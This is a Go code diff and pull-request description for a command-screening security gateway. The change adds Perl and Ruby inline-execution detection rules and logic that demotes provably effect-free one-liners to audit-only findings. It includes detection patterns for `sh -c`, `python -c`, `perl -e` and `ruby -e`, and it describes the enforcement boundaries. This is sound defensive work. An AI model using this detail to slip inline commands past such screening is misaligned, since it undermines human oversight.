 // fallback and custom rules with a reused ID retain conservative enforcement.
 var trustedLegacyProvenCommandDetectionOnly = map[string]trustedLegacyProvenCommandDetectionOnlyContract{
 	"CMD-BASH-C": {
+		category:     "command",
 		pattern:      `(?i)\b(?:ba)?sh\s+-c\s+`,
 		title:        "Shell -c execution",
 		severity:     "LOW",
@@ -453,11 +465,30 @@ var trustedLegacyProvenCommandDetectionOnly = map[string]trustedLegacyProvenComm
 		prerequisite: trustedBashInlineCommandOwnerProven,
 	},
 	"CMD-PYTHON-C": {
+		category:   "command",
 		pattern:    `(?i)\bpython[23]?\s+-c\s+`,
 		title:      "Python inline execution",
 		severity:   "LOW",
 		confidence: 0.55,
 		tags:       []string{"execution"},
+	},
+	"CMD-PERL-E": {
+		category:     "command",
+		pattern:      trustedPerlInlinePattern,
+		title:        "Perl inline execution",
+		severity:     "LOW",
+		confidence:   0.55,
+		tags:         []string{"execution"},
+		prerequisite: trustedPerlInlineEffectFreeOwnerProven,
+	},
+	"CMD-RUBY-E": {
+		category:     "command",
+		pattern:      trustedRubyInlinePattern,
+		title:        "Ruby inline execution",
+		severity:     "LOW",
+		confidence:   0.55,
+		tags:         []string{"execution"},
+		prerequisite: trustedRubyInlineEffectFreeOwnerProven,
 	},
 }
 
@@ -1246,10 +1277,11 @@ func trustedLegacyDetectionOnlyCommandRule(
 	matched := false
 	for _, category := range generation.categories {
 		for _, rule := range category.Rules {
-			if rule.ID != ruleID {
+			if canonicalTrustedRuleID(rule.ID) != canonicalTrustedRuleID(ruleID) {
 				continue
 			}
-			if matched || rule.Pattern == nil ||
+			if matched || rule.ID != ruleID || category.Name != contract.category ||
+				rule.Pattern == nil ||
 				rule.Pattern.String() != contract.pattern ||
 				rule.Expression != "" || rule.ToolCallOnly ||
 				rule.Title != contract.title ||
@@ -1262,6 +1294,10 @@ func trustedLegacyDetectionOnlyCommandRule(
 		}
 	}
 	return matched
+}
+
+func canonicalTrustedRuleID(ruleID string) string {
+	return strings.ToUpper(strings.TrimSpace(ruleID))
 }
 
 func trustedBashInlineCommandOwnerProven(facts actionfacts.Facts) bool {
@@ -1278,6 +1314,152 @@ func trustedBashInlineCommandOwnerProven(facts actionfacts.Facts) bool {
 		}
 	}
 	return false
+}
+
+func trustedPerlInlineEffectFreeOwnerProven(facts actionfacts.Facts) bool {
+	return trustedInlineEffectFreeOwnerProven(
+		facts,
+		"perl",
+		trustedPerlInlineRegexp,
+		actionfacts.RecognizesPOSIXPerlInlineBody,
+	)
+}
+
+func trustedRubyInlineEffectFreeOwnerProven(facts actionfacts.Facts) bool {
+	return trustedInlineEffectFreeOwnerProven(
+		facts,
+		"ruby",
+		trustedRubyInlineRegexp,
+		actionfacts.RecognizesPOSIXRubyInlineBody,
+	)
+}
+
+func trustedInlineEffectFreeOwnerProven(
+	facts actionfacts.Facts,
+	program string,
+	compiledPattern *regexp.Regexp,
+	recognizes func(actionfacts.CommandFact) bool,
+) bool {
+	if !facts.Authoritative() || !facts.EnforcementEligible() ||
+		recognizes == nil || compiledPattern == nil {
+		return false
+	}
+	commandIndex, ok := inlineCommandIndex(facts.Commands)
+	if !ok {
+		return false
+	}
+	matched := 0
+	for _, command := range facts.Commands {
+		text := strings.TrimSpace(command.Executable)
+		if len(command.Argv) != 0 {
+			text = serializeArgvForLegacyScan(command.Argv)
+		}
+		patternMatches := compiledPattern.MatchString(text) ||
+			compiledPattern.MatchString(normalizeShell(text))
+		if command.Program != program {
+			if patternMatches {
+				return false
+			}
+			continue
+		}
+		if !patternMatches {
+			continue
+		}
+		if command.ParentCommandID != 0 || command.Dialect != actionfacts.DialectPOSIX ||
+			command.Effect != actionfacts.EffectExecute || !command.ArgvComplete ||
+			command.PipelineID != 0 || len(command.Redirects) != 0 ||
+			len(command.Wrappers) != 0 || !recognizes(command) ||
+			actionfacts.ProvesPOSIXInlineInterpreterForkBomb(command) ||
+			len(command.Operations) != 1 || command.Operations[0] != actionfacts.OperationExecute {
+			return false
+		}
+		matched++
+	}
+	if matched == 0 {
+		return false
+	}
+	for _, command := range facts.Commands {
+		if command.ParentCommandID != 0 && (command.Program == program ||
+			inlineCommandDescendsFromProgram(commandIndex, command, program)) {
+			return false
+		}
+	}
+	for _, fact := range facts.Paths {
+		if inlineFactOwnedByProgram(commandIndex, fact.CommandID, program) {
+			return false
+		}
+	}
+	for _, fact := range facts.Network {
+		if inlineFactOwnedByProgram(commandIndex, fact.CommandID, program) {
+			return false
+		}
+	}
+	for _, fact := range facts.DataFlows {
+		if inlineFactOwnedByProgram(commandIndex, fact.FromCommandID, program) ||
+			inlineFactOwnedByProgram(commandIndex, fact.ToCommandID, program) {
+			return false
+		}
+	}
+	return true
+}
+
+func inlineCommandIndex(
+	commands []actionfacts.CommandFact,
+) (map[int64]actionfacts.CommandFact, bool) {
+	index := make(map[int64]actionfacts.CommandFact, len(commands))
+	for _, command := range commands {
+		if command.ID == 0 {
+			return nil, false
+		}
+		if _, duplicate := index[command.ID]; duplicate {
+			return nil, false
+		}
+		index[command.ID] = command
+	}
+	return index, true
+}
+
+func inlineCommandDescendsFromProgram(
+	commandIndex map[int64]actionfacts.CommandFact,
+	command actionfacts.CommandFact,
+	program string,
+) bool {
+	parentID := command.ParentCommandID
+	visited := make(map[int64]struct{}, len(commandIndex))
+	for steps := 0; parentID != 0; steps++ {
+		if steps >= len(commandIndex) {
+			return true
+		}
+		if _, repeated := visited[parentID]; repeated {
+			return true
+		}
+		visited[parentID] = struct{}{}
+		parent, found := commandIndex[parentID]
+		if !found {
+			return true
+		}
+		if parent.Program == program {
+			return true
+		}
+		parentID = parent.ParentCommandID
+	}
+	return false
+}
+
+func inlineFactOwnedByProgram(
+	commandIndex map[int64]actionfacts.CommandFact,
+	commandID int64,
+	program string,
+) bool {
+	if commandID == 0 {
+		return false
+	}
+	command, found := commandIndex[commandID]
+	if !found {
+		return true
+	}
+	return command.Program == program ||
+		inlineCommandDescendsFromProgram(commandIndex, command, program)
 }
 
 func trustedReadOnlyArgumentDataFinding(category string, finding RuleFinding) bool {


### PR DESCRIPTION
Base note: this is the Perl/Ruby Phase 2 follow-up to the merged Bash work in #713. It is a single commit on `main` at `9436470a6abb914c0dfcaec8305ea59a4f968c2f`; reviewed head is `68ca1aca354e4d22be2c9111c20a682dacbe57ff`.

Closes #708.

## Problem

Benign `perl -e` and `ruby -e` one-liners still produce ordinary LOW, enforcement-contributing `CMD-PERL-E` / `CMD-RUBY-E` findings. In strict mode those generic findings create alert and Action-mode friction even when the visible inline body is a harmless, fully static operation such as `print 1` or `puts 1`.

A rule-ID-only downgrade would be unsafe: custom rules can reuse IDs, malformed or dynamic programs must remain conservative, and a generic finding may represent more than one command contribution.

## Current Situation

ActionFacts treats inline Perl and Ruby bodies as opaque. The gateway therefore has no structural proof that a benign inline body is complete and effect-free, so the generic LOW fallback remains eligible for enforcement and Alerts.

The previously merged Bash change established the desired posture: suppress only an exact code-owned generic identity after a bounded parser proves the corresponding action, while retaining the finding as LOW `detection-only` audit telemetry.

## Solution

### Bounded inline-language facts

Add a deterministic, in-process, 2 KiB-bounded Perl/Ruby `-e` parser. It accepts a deliberately closed static grammar and projects typed path, network, flow, and child-command facts. Unknown APIs, imports, dynamic values, malformed syntax, ambiguous options, invalid executable identities, resource-limit breaches, or incomplete child semantics fail closed.

The parser never runs Perl/Ruby, imports modules, reads runtime files, or evaluates user code.

### Exact, effect-free demotion

Demote `CMD-PERL-E` or `CMD-RUBY-E` only when all of these hold for the same immutable rule generation:

1. the shipped rule has its exact category, ID, pattern, title, severity, confidence, tags, and flags;
2. no exact/case/whitespace alias or duplicate exists anywhere in that generation;
3. every command contribution matching that generic rule is a fully recognized same-language inline body;
4. the owner and its descendants have no path, network, child-command, redirect, pipeline, fork-bomb, or other non-execute effect.

Perl and Ruby are evaluated independently. Any effectful, mixed, custom, duplicate, malformed, dynamic, wrapped, or otherwise unproven case keeps the existing enforcement-contributing generic fallback.

```mermaid
flowchart TD
    A["Perl/Ruby -e command"] --> B["Bounded ActionFacts parser"]
    B -->|"unknown, dynamic, effectful, or incomplete"| C["Keep generic enforcement fallback"]
    B -->|"complete and effect-free"| D["Verify exact built-in rule identity in same generation"]
    D -->|"missing, mutated, reused, aliased, or duplicated"| C
    D -->|"exact and uniquely owned"| E["Retain LOW finding as detection-only telemetry"]
```

## What Changed (Where & How)

| Path | Change |
|---|---|
| `internal/actionfacts/inline_interpreter.go` | Adds the bounded Perl/Ruby lexer, parser, typed fact projection, exact executable checks, and positive proof helpers. |
| `internal/actionfacts/inline_interpreter_test.go` | Adds benign/effectful matrices plus malformed, dynamic, limit, token, wrapper, path-identity, child, flow, and proof regressions. |
| `internal/actionfacts/analyze.go` | Runs bounded inline expansion before generic command classification. |
| `internal/actionfacts/limits.go` | Adds explicit parser/fact budgets and keeps limit validation centralized. |
| `internal/gateway/trusted_action_dispatch.go` | Adds exact same-generation Perl/Ruby identities, precompiled scan patterns, bounded command ancestry, and all-contribution effect-free demotion prerequisites. |
| `internal/gateway/perl_ruby_inline_detection_only_test.go` | Covers profile/mode persistence and Alerts behavior, identity mutation/collision, mixed owners, malformed ancestry, normalized scan views, outbound network and reverse-shell retention, and conservative effectful cases. |
| `internal/gateway/bash_inline_detection_only_test.go` | Removes obsolete assertions that Perl/Ruby must always remain enforcement-contributing. |

## Breaking Changes

Behavior changes intentionally for structurally proven, effect-free built-in `perl -e` and `ruby -e` findings:

- the LOW generic finding remains persisted as `detection-only` telemetry;
- it no longer contributes to blocking or the Alerts query;
- effectful, malformed, dynamic, custom/reused, duplicate/aliased, wrapped, and unproven cases retain the prior conservative behavior.

There are no configuration, API, schema, or operator-workflow changes.

## Open Issues / Follow-ups

None.

## Test Plan

Observed on exact head `68ca1aca354e4d22be2c9111c20a682dacbe57ff`:

```text
go test ./internal/actionfacts -run '^TestBoundedInlineInterpreter' -count=50 -timeout=10m
PASS (0.833s)

go test ./internal/gateway -run '^TestPerlRubyInline' -count=10 -timeout=10m
PASS (8.859s)

go test -race ./internal/actionfacts -run '^TestBoundedInlineInterpreter' -count=25 -timeout=10m
PASS (2.516s)

go test -race ./internal/gateway -run '^TestPerlRubyInline' -count=3 -timeout=10m
PASS (52.779s)

go test ./internal/gateway -run '^TestPerlRubyInlineEffectfulOrUncertainOwnersRemainEnforceable$' -count=25 -timeout=10m
PASS (2.439s)

go test -race ./internal/gateway -run '^TestPerlRubyInlineEffectfulOrUncertainOwnersRemainEnforceable$' -count=5 -timeout=10m
PASS (6.178s)

go test ./internal/actionfacts -count=1 -timeout=10m
PASS (0.471s)

go vet ./internal/actionfacts ./internal/gateway
PASS

git diff --check HEAD^ HEAD
PASS
```

Final binary patch SHA-256: `7d9f33785ca70802c69f265513a4e121ecba2b4d97eeb0da6bbaf59074b5a5a8`.

The full GitHub Actions matrix is intentionally left to exact-head CI and is not claimed here before it completes.
